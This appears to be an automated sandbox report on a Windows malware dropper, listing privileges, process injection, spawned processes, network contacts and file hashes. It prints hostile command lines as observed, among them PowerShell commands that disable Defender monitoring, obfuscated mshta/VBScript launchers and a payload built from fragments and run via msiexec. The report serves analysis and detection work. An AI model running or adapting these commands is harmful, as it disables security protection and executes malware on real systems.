Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c78ded4d176ac.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe

Tue19325eb008c0b950.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe

Tue1993b3f72c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe

Tue19411ac950924ec3f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe

Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe

Tue19150ee2be694c8a4.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe

Tue19c1338f41ab.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe

Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe

Tue19879c4c0e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe

Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe

Tue193858933525b62.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe

Tue19c06f159e0ec.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe

Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c78ded4d176ac.exe

Tue19c78ded4d176ac.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe

Tue19b4ef3b53293fe.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe

Tue192762f1cd058ddf8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe"

C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp" /SL5="$C0156,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp" /SL5="$40206,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 488

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue193858933525b62.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 sayanu.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 telegatt.top udp
US 52.203.72.196:443 www.listincode.com tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
US 54.205.158.59:443 www.listincode.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 172.67.74.161:443 iplogger.org tcp
NL 194.104.136.5:46013 tcp
US 172.67.74.161:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 telegka.top udp
US 107.178.223.183:80 telegka.top tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
N/A 127.0.0.1:49318 tcp
N/A 127.0.0.1:49320 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 23.192.22.93:80 www.microsoft.com tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 104.155.138.21:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
US 72.84.118.132:8080 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 107.178.223.183:80 telegka.top tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.qxsgxd.com udp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
US 104.155.138.21:80 telegka.top tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 104.155.138.21:80 telegka.top tcp

Files

\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe

MD5 ba794724c566766d57e2aee175cde54a
SHA1 401fb41eaf42791c66738f460009ba00f7cdd913
SHA256 9a6c446576e8005dae5b5fb4df7876dea6f09501156e9a5220b60d77b41566d6
SHA512 590777c06b912054ef8722c8195521e1c74bf3f31f7c3b8e9e2b7a14352f25ed0ada8e6751916017bd506af03eb0afea0ca759872a8ff17d5837836fdaf6e774

memory/1864-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zSC6A42827\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/1864-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1864-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1864-81-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

